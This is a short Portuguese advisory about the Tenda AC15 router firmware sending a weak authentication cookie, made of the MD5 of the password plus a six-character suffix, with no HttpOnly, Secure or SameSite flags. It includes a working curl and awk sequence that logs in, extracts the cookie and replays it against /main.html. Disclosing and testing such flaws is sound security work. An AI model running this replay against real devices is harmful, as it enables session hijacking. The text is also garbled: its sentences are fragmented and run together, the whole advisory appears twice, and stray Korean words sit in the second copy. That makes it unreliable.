
Exposição de cookies no Tenda AC15
O firmware V15.03.05.18_multi do Tenda AC15 emite um cookie de autenticação no formato password=<MD5(password)><6-char suffix> e o retorna sem as flags HttpOnly, Secure ou SameSite, expondo o hash da senha ao cliente.
O sufixo de baixa entropia atua como um identificador de sessão previsível, permitindo que atacantes repitam ou sequestrem sessões.
/login/Auth emite um cookie password=<MD5(password)><6-char suffix>.HttpOnly, Secure, SameSite).document.cookie) e reutilizado em requisições para /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly, Secure e SameSite aos cookies de autenticação.O firmware V15.03.05.18_multi do Tenda AC15 emite um cookie de autenticação no formato password=<MD5(password)><6자리 접미사> e o retorna sem as flags HttpOnly, Secure e SameSite, fazendo com que o hash da senha fique exposto ao cliente.
O sufixo de baixa entropia atua como um identificador de sessão previsível, permitindo a reutilização ou o sequestro de sessão.
/login/Auth emite um cookie no formato password=<MD5(password)><6자리 접미사>.HttpOnly, Secure e SameSite.document.cookie) e reutilizado em requisições para /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly, Secure e SameSite aos cookies de autenticação.